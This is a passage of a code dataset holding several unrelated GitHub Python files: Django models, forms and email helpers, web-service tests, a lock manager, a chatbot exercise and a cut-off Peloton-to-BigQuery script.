self.wait_query_lock(pattern)\n\n\n #Genereal methods for a lock\n def get_lock(self,pattern,list_of_locks,update_lock):\n index = self.hash(pattern)\n with update_lock:\n # creates a new lock, if it does not exist for the given index\n if not list_of_locks[index]:\n list_of_locks[index].append(Condition(lock=Lock()))\n list_of_locks[index][0].acquire()\n\n def release_lock(self,pattern,list_of_locks,notify=False):\n index = self.hash(pattern)\n if notify:\n list_of_locks[index][0].notify_all()\n list_of_locks[index][0].release()\n\n def wait_lock(self,pattern,list_of_locks):\n list_of_locks[self.hash(pattern)][0].wait()\n\n\n #Methods for managing the mutation locks\n @contextmanager\n def mutation_lock(self,pattern,notify=False):\n self.get_lock(pattern, self.mutation_locks_list, self.mutation_lock_update)\n try:\n yield\n finally:\n self.release_lock(pattern, self.mutation_locks_list,notify=notify)\n\n def get_mutation_lock(self,pattern):\n self.get_lock(pattern,self.mutation_locks_list,self.mutation_lock_update)\n\n def release_mutation_lock(self,pattern,notify=False):\n self.release_lock(pattern,self.mutation_locks_list,notify=notify)\n\n def wait_mutation_lock(self,pattern):\n self.wait_lock(pattern,self.mutation_locks_list)\n\n\n #Methods for managing the query locks\n @contextmanager\n def query_lock(self,pattern,notify=False):\n self.get_lock(pattern, self.query_locks_list, self.query_lock_update)\n try:\n yield\n finally:\n self.release_lock(pattern, self.query_locks_list,notify=notify)\n\n def wait_query_lock(self,pattern):\n self.wait_lock(pattern,self.query_locks_list)\n\n #Methods for updating the number of readers in each bucket\n @contextmanager\n def readers_lock(self,pattern):\n self.get_lock(pattern,self.readers_locks_list,self.readers_lock_list_update)\n try:\n yield\n finally:\n self.release_lock(pattern, self.readers_locks_list)\n\n def addReader(self,pattern):\n index = self.hash(pattern)\n with self.reader_lock_update:\n if not self.readers_list[index]:\n self.readers_list[index].append(0)\n self.readers_list[index][0] += 1\n return self.readers_list[index][0]\n\n def removeReader(self,pattern):\n index = self.hash(pattern)\n self.readers_list[index][0] -= 1\n return self.readers_list[index][0]\n","repo_name":"zachasme/school-pyresp","sub_path":"pyresp/tuplespace/parallel_buckets.py","file_name":"parallel_buckets.py","file_ext":"py","file_size_in_byte":5652,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"21"} +{"seq_id":"6309551417","text":"#!/usr/bin/env python2\n# -*- coding: utf-8 -*-\n\nclass debugInp():\n def __init__(self):\n self.ebeam = 76.56296774\n self.pbeam = 4.88\n self.rtang = 1.715\n self.BT0 = 2.0\n self.nbeams_loc='/home/jonathan/Dropbox/GTEDGE/MyPrograms/GTEDGE/lib/beams/NBeamsMDS/NBeams/bin/Release/nbeams'\n","repo_name":"gt-frc/gt3","sub_path":"GT3/BeamDeposition/Test/DebugInp.py","file_name":"DebugInp.py","file_ext":"py","file_size_in_byte":319,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"} +{"seq_id":"35401530109","text":"import uuid\n\nimport nose\nimport requests\n\nimport hermes\nfrom . import _utils as tu\n\n\n\n# Web service endpoints.\n_EP_BASE = r\"http://localhost:8888/api/1/simulation/metrics/{}\"\n_EP_ADD = _EP_BASE.format(\"add\")\n_EP_DELETE = _EP_BASE.format(\"delete?group={0}\")\n_EP_FETCH = _EP_BASE.format(\"fetch?group={0}\")\n_EP_FETCH_COLUMNS = _EP_BASE.format(\"fetch_columns?group={0}\")\n_EP_FETCH_COUNT = _EP_BASE.format(\"fetch_count?group={0}\")\n_EP_FETCH_LIST = _EP_BASE.format(\"fetch_list\")\n_EP_FETCH_SETUP = _EP_BASE.format(\"fetch_setup?group={0}\")\n_EP_RENAME = _EP_BASE.format(\"rename?group={0}&new_name={1}\")\n\n# Existing metric groups.\n_GROUPS = set()\n\n# Group name length constraints.\n_GROUP_NAME_MIN_LENGTH = 4\n_GROUP_NAME_MAX_LENGTH = 256\n\n\n\ndef _on_test_setup():\n\t\"\"\"Test setup.\n\n\t\"\"\"\n\tr = tu.invoke_api(requests.get, _EP_FETCH_LIST)\n\tr = r.json()\n\t_GROUPS.update(r['groups'])\n\n\ndef _on_test_teardown():\n\t\"\"\"Test teardown.\n\n\t\"\"\"\n\tr = tu.invoke_api(requests.get, _EP_FETCH_LIST)\n\tr = r.json()\n\tfor group in [g for g in r['groups'] if g not in _GROUPS]:\n\t\ttu.invoke_api(requests.post, _EP_DELETE.format(group))\n\n\ndef _get_metrics():\n\t\"\"\"Returns a set of valid metrics.\n\n\t\"\"\"\n\treturn {\n\t\tu'columns': [\n\t\t\tu'a', u'b', u'c', u'd', u'e', u'f', '_id'\n\t\t],\n\t\tu'group': tu.get_string(12),\n\t\tu'metrics': [\n\t\t\t[1, 2, 3, 4, 5, 6, unicode(uuid.uuid4())],\n\t\t\t[1, 2, 3, 4, 5, 6, unicode(uuid.uuid4())],\n\t\t\t[1, 2, 3, 4, 5, 6, unicode(uuid.uuid4())],\n\t\t\t[1, 2, 3, 4, 5, 6, unicode(uuid.uuid4())],\n\t\t\t[1, 2, 3, 4, 5, 6, unicode(uuid.uuid4())],\n\t\t\t[1, 2, 3, 4, 5, 6, unicode(uuid.uuid4())],\n\t\t]\n\t}\n\n\ndef _yield_invalid_metrics():\n\t\"\"\"Yield invalid metrics for testing purposes.\n\n\t\"\"\"\n\tdef _get_invalid_metrics_01():\n\t\t\"\"\"Returns a set of metrics with an invalid group name.\"\"\"\n\t\tdata = _get_metrics()\n\t\tdata['group'] = u'test-#$%'\n\n\t\treturn data\n\n\n\tdef _get_invalid_metrics_02():\n\t\t\"\"\"Returns a set of metrics with an invalid group name.\"\"\"\n\t\tdata = _get_metrics()\n\t\tdata['group'] = u\"\"\n\t\tfor i in range(_GROUP_NAME_MIN_LENGTH - 1):\n\t\t\tdata['group'] += u\"A\"\n\n\t\treturn data\n\n\n\tdef _get_invalid_metrics_03():\n\t\t\"\"\"Returns a set of metrics with an invalid group name.\"\"\"\n\t\tdata = _get_metrics()\n\t\tdata['group'] = u\"\"\n\t\tfor i in range(_GROUP_NAME_MAX_LENGTH + 1):\n\t\t\tdata['group'] += u\"A\"\n\n\t\treturn data\n\n\n\tdef _get_invalid_metrics_04():\n\t\t\"\"\"Returns a set of metrics with a column mismatch.\"\"\"\n\t\tdata = _get_metrics()\n\t\tdata['metrics'] = [\n\t\t\t[1, 2, 3, 4, 5],\n\t\t\t[1, 2, 3, 4, 5, 6],\n\t\t]\n\n\t\treturn data\n\n\n\tdef _get_invalid_metrics_05():\n\t\t\"\"\"Returns a set of metrics with an invalid column name.\"\"\"\n\t\tdata = _get_metrics()\n\t\tdata['columns'] = data['columns'][:5] + [\"metric_id\"]\n\n\t\treturn data\n\n\t# Yield factory functions.\n\tyield _get_invalid_metrics_01\n\tyield _get_invalid_metrics_02\n\tyield _get_invalid_metrics_03\n\tyield _get_invalid_metrics_04\n\tyield _get_invalid_metrics_05\n\n\ndef _assert_fetch_count(r, m):\n\t\"\"\"Asserts web service endpoint response: fetch-count.\n\n\t\"\"\"\n\tresponse = tu.assert_api_response(r)\n\ttu.assert_string(m['group'], response['group'])\n\ttu.assert_integer(len(m['metrics']), int(response['count']))\n\n\ndef _assert_fetch_columns(r, m):\n\t\"\"\"Asserts web service endpoint response: fetch-columns.\n\n\t\"\"\"\n\texpected = m.copy()\n\tdel expected['metrics']\n\n\ttu.assert_api_response(r, expected_data=expected)\n\n\ndef _assert_fetch_list(r, old_list=None, diff=1):\n\t\"\"\"Asserts web service endpoint response: fetch-list.\n\n\t\"\"\"\n\tresponse = tu.assert_api_response(r)\n\tif old_list:\n\t\tnew_list = response['groups']\n\t\tfor item in old_list:\n\t\t\tassert item in new_list\n\t\tif diff:\n\t\t\ttu.assert_integer(len(new_list), len(old_list) + diff)\n\n\ndef _assert_fetch_setup(r, m):\n\t\"\"\"Asserts web service endpoint response: fetch-setup.\n\n\t\"\"\"\n\texpected = m.copy()\n\tdel expected['metrics']\n\texpected['data'] = [set() for _ in m['columns']]\n\tfor row in m['metrics']:\n\t\tfor i in range(0, len(m['columns']) - 1):\n\t\t\texpected['data'][i].add(row[i])\n\texpected['data'] = [list(i) for i in expected['data']]\n\tresponse = tu.assert_api_response(r)\n\n\ndef _test_positive():\n\t\"\"\"testing sim-metrics web service: postive\n\n\t\"\"\"\n\t# Fetch list.\n\tr = tu.invoke_api(requests.get, _EP_FETCH_LIST)\n\t_assert_fetch_list(r)\n\tm_list = r.json()['groups']\n\n\t# Add.\n\tm = _get_metrics()\n\tr = tu.invoke_api(requests.post, _EP_ADD, m)\n\ttu.assert_api_response(r)\n\n\t# Fetch.\n\tr = tu.invoke_api(requests.get, _EP_FETCH.format(m['group']))\n\ttu.assert_api_response(r, expected_data=m)\n\tm_fetched = r.json()\n\n\t# Fetch columns.\n\tr = tu.invoke_api(requests.get, _EP_FETCH_COLUMNS.format(m['group']))\n\t_assert_fetch_columns(r, m)\n\n\t# Fetch count.\n\tr = tu.invoke_api(requests.get, _EP_FETCH_COUNT.format(m['group']))\n\t_assert_fetch_count(r, m)\n\n\t# # Fetch list.\n\tr = tu.invoke_api(requests.get, _EP_FETCH_LIST)\n\t_assert_fetch_list(r, old_list=m_list, diff=1)\n\n\t# Fetch setup.\n\tr = tu.invoke_api(requests.get, _EP_FETCH_SETUP.format(m['group']))\n\t_assert_fetch_setup(r, m)\n\n\t# Rename.\n\tnew_name = tu.get_string(12)\n\tr = tu.invoke_api(requests.post, _EP_RENAME.format(m['group'], new_name))\n\ttu.assert_api_response(r)\n\n\t# Delete.\n\tr = tu.invoke_api(requests.post, _EP_DELETE.format(new_name))\n\ttu.assert_api_response(r)\n\n\t# Fetch list.\n\tr = tu.invoke_api(requests.get, _EP_FETCH_LIST)\n\t_assert_fetch_list(r, old_list=m_list, diff=0)\n\n\t# Fetch.\n\tr = tu.invoke_api(requests.get, _EP_FETCH.format(new_name))\n\ttu.assert_integer(r.status_code, 400)\n\n\ndef _test_negative():\n\t\"\"\"testing sim-metrics web service: negative\n\n\t\"\"\"\n\tfor m in (f() for f in _yield_invalid_metrics()):\n\t\tr = tu.invoke_api(requests.post, _EP_ADD, m)\n\t\ttu.assert_integer(r.status_code, 400)\n\n\n@nose.tools.with_setup(setup=_on_test_setup, teardown=_on_test_teardown)\ndef test():\n\t\"\"\"Tests sim-metrics web service.\n\n\t\"\"\"\n\tfor test in (\n\t\t_test_positive,\n\t\t_test_negative\n\t\t):\n\t\ttest.description = test.__doc__.strip()\n\t\tyield test\n","repo_name":"ESPRI-Mod/hermes-server","sub_path":"tests/test_web_sim_metrics.py","file_name":"test_web_sim_metrics.py","file_ext":"py","file_size_in_byte":5807,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"73727630132","text":"t = int(input())\r\nfor i in range(1, t+1):\r\n ab_len = list(map(int, input().split()))\r\n answer = 0\r\n a = list(map(int, input().split()))\r\n b = list(map(int, input().split()))\r\n\r\n if len(a) > len(b):\r\n max = a\r\n min = b\r\n else:\r\n max = b\r\n min = a\r\n\r\n sum_list = []\r\n print(len(max)-len(min)+1)\r\n print(f'max는 {max}')\r\n print(f'min은 {min}')\r\n for j in range(0, len(max)-len(min)+1):\r\n sum = 0\r\n for k in range(j, len(min)+j):\r\n sum += max[k] * min[k-j]\r\n sum_list.append(sum)\r\n print(sum_list)\r\n answer = sum_list[0]\r\n for val in sum_list:\r\n if val > answer:\r\n answer = val\r\n\r\n print('#{} {}'.format(i, answer))","repo_name":"eprj453/algorithm","sub_path":"PYTHON/SWEXPERTACADEMY/D2/1959.py","file_name":"1959.py","file_ext":"py","file_size_in_byte":736,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"6899280114","text":"import datetime\nimport json\nfrom enum import Enum, auto\nfrom uuid import uuid4\n\nfrom common import app_settings\nfrom common.app_settings import domain\nfrom common.email_messages import (\n emailChangeNotificationEmail,\n emailChangeVerificationEmail,\n emailChangeDuplicateNotificationEmail,\n emailVerificationNeededEmail,\n parentsEmailVerificationNeededEmail,\n)\nfrom common.models import EmailVerification, Teacher, Student\nfrom django.contrib.auth.models import User\nfrom django.core.mail import EmailMultiAlternatives\nfrom django.http import HttpResponse\nfrom django.template import loader\nfrom django.utils import timezone\nfrom requests import post, get, put, delete\nfrom requests.exceptions import RequestException\n\nNOTIFICATION_EMAIL = \"Code For Life Notification <\" + app_settings.EMAIL_ADDRESS + \">\"\nVERIFICATION_EMAIL = \"Code For Life Verification <\" + app_settings.EMAIL_ADDRESS + \">\"\nPASSWORD_RESET_EMAIL = \"Code For Life Password Reset <\" + app_settings.EMAIL_ADDRESS + \">\"\nINVITE_FROM = \"Code For Life Invitation <\" + app_settings.EMAIL_ADDRESS + \">\"\n\n\nclass DotmailerUserType(Enum):\n TEACHER = auto()\n STUDENT = auto()\n NO_ACCOUNT = auto()\n\n\ndef send_email(\n sender,\n recipients,\n subject,\n text_content,\n title,\n html_content=None,\n plaintext_template=\"email.txt\",\n html_template=\"email.html\",\n):\n\n # add in template for templates to message\n\n # setup templates\n plaintext = loader.get_template(plaintext_template)\n html = loader.get_template(html_template)\n plaintext_email_context = {\"content\": text_content}\n html_email_context = {\"content\": text_content, \"title\": title, \"url_prefix\": domain()}\n\n # render templates\n plaintext_body = plaintext.render(plaintext_email_context)\n html_body = html.render(html_email_context)\n\n # make message using templates\n message = EmailMultiAlternatives(subject, plaintext_body, sender, recipients)\n message.attach_alternative(html_body, \"text/html\")\n\n message.send()\n\n\ndef generate_token(user, email=\"\", preverified=False):\n return EmailVerification.objects.create(\n user=user,\n email=email,\n token=uuid4().hex[:30],\n expiry=timezone.now() + datetime.timedelta(hours=1),\n verified=preverified,\n )\n\n\ndef send_verification_email(request, user, new_email=None, age=None):\n \"\"\"Send an email prompting the user to verify their email address.\"\"\"\n\n if not new_email: # verifying first email address\n user.email_verifications.all().delete()\n\n verification = generate_token(user)\n\n if age is not None and age < 13:\n message = parentsEmailVerificationNeededEmail(request, user, verification.token)\n send_email(VERIFICATION_EMAIL, [user.email], message[\"subject\"], message[\"message\"], message[\"subject\"])\n else:\n message = emailVerificationNeededEmail(request, verification.token)\n send_email(VERIFICATION_EMAIL, [user.email], message[\"subject\"], message[\"message\"], message[\"subject\"])\n\n else: # verifying change of email address.\n verification = generate_token(user, new_email)\n\n message = emailChangeVerificationEmail(request, verification.token)\n send_email(VERIFICATION_EMAIL, [user.email], message[\"subject\"], message[\"message\"], message[\"subject\"])\n\n message = emailChangeNotificationEmail(request, new_email)\n send_email(VERIFICATION_EMAIL, [user.email], message[\"subject\"], message[\"message\"], message[\"subject\"])\n\n\ndef is_verified(user):\n \"\"\"Check that a user has verified their email address.\"\"\"\n verifications = user.email_verifications.filter(verified=True)\n return len(verifications) != 0\n\n\ndef add_to_dotmailer(first_name: str, last_name: str, email: str, user_type: DotmailerUserType):\n try:\n create_contact(first_name, last_name, email)\n add_contact_to_address_book(first_name, last_name, email, user_type)\n except RequestException:\n return HttpResponse(status=404)\n\n\ndef create_contact(first_name, last_name, email):\n url = app_settings.DOTMAILER_CREATE_CONTACT_URL\n body = {\n \"contact\": {\n \"email\": email,\n \"optInType\": \"VerifiedDouble\",\n \"emailType\": \"Html\",\n \"dataFields\": [\n {\"key\": \"FIRSTNAME\", \"value\": first_name},\n {\"key\": \"LASTNAME\", \"value\": last_name},\n {\"key\": \"FULLNAME\", \"value\": f\"{first_name} {last_name}\"},\n ],\n },\n \"consentFields\": [{\"fields\": [{\"key\": \"DATETIMECONSENTED\", \"value\": datetime.datetime.now().__str__()}]}],\n \"preferences\": app_settings.DOTMAILER_DEFAULT_PREFERENCES,\n }\n\n post(url, json=body, auth=(app_settings.DOTMAILER_USER, app_settings.DOTMAILER_PASSWORD))\n\n\ndef add_contact_to_address_book(first_name: str, last_name: str, email: str, user_type: DotmailerUserType):\n main_address_book_url = app_settings.DOTMAILER_MAIN_ADDRESS_BOOK_URL\n\n body = {\n \"email\": email,\n \"optInType\": \"VerifiedDouble\",\n \"emailType\": \"Html\",\n \"dataFields\": [\n {\"key\": \"FIRSTNAME\", \"value\": first_name},\n {\"key\": \"LASTNAME\", \"value\": last_name},\n {\"key\": \"FULLNAME\", \"value\": f\"{first_name} {last_name}\"},\n ],\n }\n\n post(main_address_book_url, json=body, auth=(app_settings.DOTMAILER_USER, app_settings.DOTMAILER_PASSWORD))\n\n specific_address_book_url = app_settings.DOTMAILER_NO_ACCOUNT_ADDRESS_BOOK_URL\n\n if user_type == DotmailerUserType.TEACHER:\n specific_address_book_url = app_settings.DOTMAILER_TEACHER_ADDRESS_BOOK_URL\n elif user_type == DotmailerUserType.STUDENT:\n specific_address_book_url = app_settings.DOTMAILER_STUDENT_ADDRESS_BOOK_URL\n\n post(specific_address_book_url, json=body, auth=(app_settings.DOTMAILER_USER, app_settings.DOTMAILER_PASSWORD))\n\n\ndef delete_contact(email: str):\n try:\n user = get_dotmailer_user_by_email(email)\n user_id = user.get(\"id\")\n if user_id:\n url = app_settings.DOTMAILER_DELETE_USER_BY_ID_URL.replace(\"ID\", str(user_id))\n delete(url, auth=(app_settings.DOTMAILER_USER, app_settings.DOTMAILER_PASSWORD))\n except RequestException:\n return HttpResponse(status=404)\n\n\ndef get_dotmailer_user_by_email(email):\n url = app_settings.DOTMAILER_GET_USER_BY_EMAIL_URL.replace(\"EMAIL\", email)\n\n response = get(url, auth=(app_settings.DOTMAILER_USER, app_settings.DOTMAILER_PASSWORD))\n\n return json.loads(response.content)\n\n\ndef add_consent_record_to_dotmailer_user(user):\n consent_date_time = datetime.datetime.now().__str__()\n\n url = app_settings.DOTMAILER_PUT_CONSENT_DATA_URL.replace(\"USER_ID\", str(user[\"id\"]))\n body = {\n \"contact\": {\n \"email\": user[\"email\"],\n \"optInType\": user[\"optInType\"],\n \"emailType\": user[\"emailType\"],\n \"dataFields\": user[\"dataFields\"],\n },\n \"consentFields\": [{\"fields\": [{\"key\": \"DATETIMECONSENTED\", \"value\": consent_date_time}]}],\n }\n\n put(url, json=body, auth=(app_settings.DOTMAILER_USER, app_settings.DOTMAILER_PASSWORD))\n\n\ndef send_dotmailer_consent_confirmation_email_to_user(user):\n url = app_settings.DOTMAILER_SEND_CAMPAIGN_URL\n campaign_id = app_settings.DOTMAILER_THANKS_FOR_STAYING_CAMPAIGN_ID\n body = {\"campaignID\": campaign_id, \"contactIds\": [str(user[\"id\"])]}\n\n post(url, json=body, auth=(app_settings.DOTMAILER_USER, app_settings.DOTMAILER_PASSWORD))\n\n\ndef update_indy_email(user, request, data):\n changing_email = False\n new_email = data[\"email\"]\n\n if new_email != \"\" and new_email != user.email:\n changing_email = True\n users_with_email = User.objects.filter(email=new_email)\n # email is already taken\n if users_with_email.exists():\n email_message = emailChangeDuplicateNotificationEmail(request, new_email)\n send_email(\n NOTIFICATION_EMAIL,\n [user.email],\n email_message[\"subject\"],\n email_message[\"message\"],\n email_message[\"subject\"],\n )\n else:\n # new email to set and verify\n send_verification_email(request, user, new_email)\n return changing_email, new_email\n\n\ndef update_email(user: Teacher or Student, request, data):\n changing_email = False\n new_email = data[\"email\"]\n\n if new_email != \"\" and new_email != user.new_user.email:\n changing_email = True\n users_with_email = User.objects.filter(email=new_email)\n # email is already taken\n if users_with_email.exists():\n email_message = emailChangeDuplicateNotificationEmail(request, new_email)\n send_email(\n NOTIFICATION_EMAIL,\n [user.new_user.email],\n email_message[\"subject\"],\n email_message[\"message\"],\n email_message[\"subject\"],\n )\n else:\n # new email to set and verify\n send_verification_email(request, user.new_user, new_email)\n return changing_email, new_email\n","repo_name":"bspindler1/Speed-Demon","sub_path":"venv/lib/python3.8/site-packages/common/helpers/emails.py","file_name":"emails.py","file_ext":"py","file_size_in_byte":9110,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"26430748810","text":"'''\nFiltering with excluded slots\nNow you're going to put together some of the ideas from previous exercises in\norder to allow users to tell your bot about what they do and do not want,\nsplit across multiple messages.\n\nThe negated_ents() function has already been defined for you. Additionally,\na slightly tweaked version of the find_hotels() function, which accepts a\nneg_params dictionary in addition to a params dictionary, has been defined.\n\n'''\n# Define the respond function\ndef respond(message, params, neg_params):\n # Extract the entities\n entities = interpreter.parse(message)[\"entities\"]\n ent_vals = [e[\"value\"] for e in entities]\n # Look for negated entities\n negated = negated_ents(message, ent_vals)\n for ent in entities:\n if ent[\"value\"] in negated and negated[ent[\"value\"]]:\n neg_params[ent[\"entity\"]] = str(ent[\"value\"])\n else:\n params[ent[\"entity\"]] = str(ent[\"value\"])\n # Find the hotels\n results = find_hotels(params, neg_params)\n names = [r[0] for r in results]\n n = min(len(results),3)\n # Return the correct response\n return responses[n].format(*names), params, neg_params\n\n# Initialize params and neg_params\nparams = {}\nneg_params = {}\n\n# Pass the messages to the bot\nfor message in [\"I want a cheap hotel\", \"but not in the north of town\"]:\n print(\"USER: {}\".format(message))\n response, params, neg_params = respond(message, params, neg_params)\n print(\"BOT: {}\".format(response))\n","repo_name":"kaushalpowar/nlp_learning","sub_path":"filtering_with_Excluded_slots.py","file_name":"filtering_with_Excluded_slots.py","file_ext":"py","file_size_in_byte":1482,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"18751858677","text":"from django import forms\nfrom django.core.exceptions import ValidationError\nfrom django.core.mail import BadHeaderError, mail_managers\n\n\nclass ContactForm(forms.Form):\n email = forms.EmailField(initial='user@yourdomain.org')\n # force a CharField to be visualized as TextArea on th eHTML page\n text = forms.CharField(widget=forms.Textarea)\n\n FEEDBACK = 'F'\n CORRECTION = 'C'\n SUPPORT = 'S'\n CHOICE_SELECTED = (\n (FEEDBACK, 'Feedback'),\n (CORRECTION, 'Correction'),\n (SUPPORT, 'Support'),\n )\n contact_reason_selector = forms.ChoiceField(\n choices=CHOICE_SELECTED, initial=FEEDBACK\n )\n\n def send_email(self):\n # Get the (guaranteed) cleaned content of the selector\n contact_reason = self.cleaned_data.get('contact_reason_selector')\n # make a dictionary from the CHOICE_SELECTED enumerator\n contact_reason_dictionary = dict(self.CHOICE_SELECTED)\n # Get the full information from the selector (not simply the initials 'F', 'C' or 'S')\n cleaned_selection = contact_reason_dictionary.get(contact_reason)\n email = self.cleaned_data.get('email')\n text = self.cleaned_data.get('text')\n message_body = 'Message from: {}\\n\\n{}'.format(email, text)\n\n try:\n mail_managers(cleaned_selection, message_body)\n except BadHeaderError:\n self.add_error(None, ValidationError('Could not send the email.\\n'\n 'Extra Headers are not allowed'\n 'in the message body.'))\n return False\n else:\n return True\n","repo_name":"SteelTurtle/django_store","sub_path":"contact/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":1661,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"12453366242","text":"import math\n\nfrom django.contrib.auth.models import User\nfrom django.db import models\nfrom django.utils.html import mark_safe\nfrom django.utils.text import Truncator\nfrom taggit.managers import TaggableManager\nfrom django.utils import timezone\nfrom django.utils.html import format_html\n\nfrom PIL import Image\nfrom sorl.thumbnail import get_thumbnail\nfrom sorl.thumbnail import ImageField\nfrom markdown import markdown\n\n# references:\n# for sorl.thumbnail: https://sorl-thumbnail.readthedocs.io/en/latest/examples.html\n\nppt_master_choices = [\n ('master1', 'Guardian Master PPT'),\n]\n\n###########################################################################################################\nclass Presentation(models.Model):\n\n name = models.CharField(\n max_length=200,\n # unique=True\n )\n\n description = models.CharField(\n max_length=1000,\n default='',\n blank=True\n )\n\n ppt_file = models.FileField(\n upload_to='exported_pres_ppt/',\n null = True,\n blank = True,\n verbose_name = 'Exported PPT file',\n )\n\n pdf_file = models.FileField(\n upload_to='exported_pres_pdf/',\n null = True,\n blank = True,\n verbose_name = 'Exported PDF file'\n )\n\n ppt_master_file = models.CharField(\n max_length = 20,\n null = True,\n blank = True,\n choices = ppt_master_choices,\n default = 'master1',\n verbose_name = 'PPT Master Layout'\n )\n\n created_by = models.ForeignKey(\n User,\n related_name='creator',\n null = True,\n on_delete=models.CASCADE\n )\n\n updated_by = models.ForeignKey(\n User,\n related_name='updater',\n null = True,\n on_delete=models.CASCADE\n )\n\n created_at = models.DateTimeField(\n editable=False,\n auto_now=True,\n # default=timezone.now()\n )\n\n updated_at = models.DateTimeField(\n auto_now_add=True,\n # default=timezone.now()\n )\n\n active = models.BooleanField(\n default=True\n )\n\n tags = TaggableManager()\n\n def __str__(self):\n return self.name\n\n class Meta:\n verbose_name = 'Presentation'\n verbose_name_plural = 'Presentations'\n ordering = [\"-created_at\"]\n\n###########################################################################################################\nclass SnippetHtml(models.Model):\n name = models.CharField(\n max_length=200,\n null = True,\n blank = True,\n verbose_name = 'Title'\n )\n\n htmltext = models.TextField(\n null = True,\n blank = True,\n verbose_name= 'Content'\n )\n\n def get_htmltext_as_markdown(self):\n return mark_safe(markdown(self.htmltext, safe_mode='escape'))\n\n # return mark_safe(self.htmltext)\n # return htmltext\n\n get_htmltext_as_markdown.short_description = 'Content preview'\n\n\n def __str__(self):\n return self.name\n\n class Meta:\n verbose_name = 'HTML Text'\n verbose_name_plural = 'HTML Texts'\n\n###########################################################################################################\nclass Snippet(models.Model):\n name = models.CharField(\n max_length=50,\n blank=True\n )\n\n # embedded = models.TextField(\n embedded = models.CharField(\n max_length=2000,\n blank=True\n )\n\n # file will be uploaded to MEDIA_ROOT/image_rendered\n image_rendered = models.ImageField(\n upload_to='image_rendered/',\n verbose_name='Rendered Report',\n null = True,\n blank = True\n )\n\n # using sorl.thumbnail.ImageField\n image_cropped = ImageField(\n upload_to='image_cropped/',\n verbose_name='Report Snippet',\n null = True,\n blank = True\n )\n\n # @property\n def render_button(self):\n html = \"\"\"\n \n \"\"\"\n return mark_safe(html)\n\n render_button.short_description = ''\n\n x = models.FloatField(\n default=0\n )\n\n y = models.FloatField(\n default=0\n )\n\n w = models.FloatField(\n default=0\n )\n\n h = models.FloatField(\n default=0\n )\n\n created_at = models.DateTimeField(\n editable=False,\n auto_now=True,\n )\n\n updated_at = models.DateTimeField(\n auto_now_add=True,\n )\n\n created_by = models.ForeignKey(\n User,\n related_name='snippet_creator',\n null = True,\n on_delete=models.CASCADE\n )\n\n updated_by = models.ForeignKey(\n User,\n related_name='snippet_updater',\n null = True,\n on_delete=models.CASCADE\n )\n\n # will be available as bipage.pages_set and snippet.bipages\n # pages = models.ManyToManyField(Bipage)\n\n tags = TaggableManager(\n blank = True\n )\n\n def __str__(self):\n return self.name\n\n # overwritting save\n def save(self, *args, **kwargs):\n super().save(*args, **kwargs)\n # img = Image.open(self.image_cropped.path)\n # output_size = (125, 125)\n # img.thumbnail(output_size)\n # img.save(self.image.path)\n\n\n class Meta:\n verbose_name = 'snippet'\n verbose_name_plural = 'snippets'\n\n###########################################################################################################\nppt_page_layout_choices = [\n ('header', 'Header Page'),\n ('content1', 'Content With 1 Placeholder'),\n ('content2', 'Content With 2 Columns'),\n]\nclass Bipage(models.Model):\n\n name = models.CharField(\n max_length=100,\n null = True,\n blank = True,\n verbose_name = 'Internal name'\n )\n\n title = models.CharField(\n max_length=200,\n null = True,\n blank = True,\n verbose_name = 'Title'\n )\n\n subtitle = models.CharField(\n max_length=200,\n null = True,\n blank = True,\n verbose_name = 'Subtitle'\n )\n\n snippets = models.ManyToManyField(\n Snippet,\n # null = True,\n blank = True,\n )\n\n texts = models.ManyToManyField(\n SnippetHtml,\n # null = True,\n blank = True,\n\n )\n\n ppt_file = models.FileField(\n upload_to='exported_pages_ppt/',\n null = True,\n blank = True,\n verbose_name = 'Exported PPT file'\n )\n\n pdf_file = models.FileField(\n upload_to='exported_pages_pdf/',\n null = True,\n blank = True,\n verbose_name = 'Exported PDF file',\n )\n\n ppt_page_layout = models.CharField(\n max_length = 200,\n null = True,\n blank = True,\n choices = ppt_page_layout_choices,\n default = 'content1',\n verbose_name = 'PPT Page Layout'\n )\n\n presentation = models.ForeignKey(\n Presentation,\n related_name='presentations',\n on_delete=models.CASCADE\n )\n\n last_updated = models.DateTimeField(\n auto_now_add=True\n )\n\n\n def page_preview(self):\n html = \"\"\"\n \n \"\"\".format(self.pk)\n\n return mark_safe(html)\n\n page_preview.short_description = ''\n\n def layout_preview(self):\n\n html = \"\"\"\n \n \"\"\".format(self.ppt_page_layout)\n\n return mark_safe(html)\n\n layout_preview.short_description = ''\n\n\n def __str__(self):\n return self.name\n\n\n class Meta:\n verbose_name = 'BI Page'\n verbose_name_plural = 'BI Pages'\n\n","repo_name":"cburke8/bi-portal","sub_path":"mainsite/biportal/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":7933,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"28187757112","text":"# To add a new cell, type '# %%'\n# To add a new markdown cell, type '# %% [markdown]'\n# %%\nimport os\n\nfrom google.cloud import bigquery\nfrom google.cloud import secretmanager\nimport pandas as pd\n\nimport log\nimport peloton_instructor\nimport peloton_user\nimport peloton_ride\nimport peloton_workout\n\nUSERNAME=os.environ['USERNAME']\nGCP_PROJECT_ID=os.environ['GCP_PROJECT_ID']\nSECRET_MANAGER=os.environ['SECRET_MANAGER']\nBIGQUERY_DATASET=os.environ['BIGQUERY_DATASET']\n\n# configure logging\nlogger = log.setup_custom_logger('peloton')\n\n# initialize bigquery\nclient = bigquery.Client()\n\n# initalize secret manager and access secret\nmanager = secretmanager.SecretManagerServiceClient()\nname = manager.secret_version_path(GCP_PROJECT_ID, SECRET_MANAGER, 'latest')\nresponse = manager.access_secret_version(name)\nPASSWORD = response.payload.data.decode('UTF-8')\n\n# %% [markdown]\n# # Users\n# In the section below we create the Peloton user, authenticate with the API, and send user data to a table in BigQuery.\n\n# %%\n\nuser = 